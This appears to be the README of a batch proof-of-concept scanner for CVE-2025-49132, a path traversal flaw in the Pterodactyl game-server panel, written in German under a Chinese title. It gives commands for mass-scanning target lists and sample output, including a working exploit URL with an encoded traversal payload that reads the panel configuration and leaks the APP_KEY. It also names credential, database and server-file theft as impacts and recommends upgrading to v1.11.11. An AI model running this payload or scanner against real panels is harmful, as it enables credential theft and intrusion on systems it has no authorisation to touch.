
Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f zielliste.txt
python3 CVE-2025-49132_poc.py -f zielliste.txt -o scanergebnisse.txt
Wenn eine Schwachstelle vorhanden ist:
[+] Schwachstelle vorhanden: Schwachstelle bestätigt
Schwachstellendetails:
• Schwachstellentyp: Pfadausgabe (Path Traversal)
• Angriffsvektor: Zugriff auf /locales/locale.json über Pfadausgabe-Parameter
• Exploit-URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
Mögliche Auswirkungen:
• Lesen von Anmeldeinformationen aus der Panel-Konfigurationsdatei (.env)
• Extrahieren vertraulicher Informationen aus der Datenbank
• Zugriff auf vom Panel verwaltete Spielserver-Dateien
Extrahierter APP_KEY: base64{{your_secret_key_here}}
Behebungsempfehlung: Sofort auf Pterodactyl v1.11.11 oder höher aktualisieren
Wenn keine Schwachstelle vorhanden ist:
[-] Keine Schwachstelle: Keine Schwachstelle vorhanden (Statuscode: 404)
Scan-Zusammenfassung:
Scan-Zusammenfassung:
• Gesamtzahl gescannter Ziele: 5
• Ziele mit Schwachstelle: 2
• Sichere Ziele: 3
[!] Kritisch: Es wurden Systeme mit Schwachstellen erkannt! Sofortige Maßnahmen erforderlich.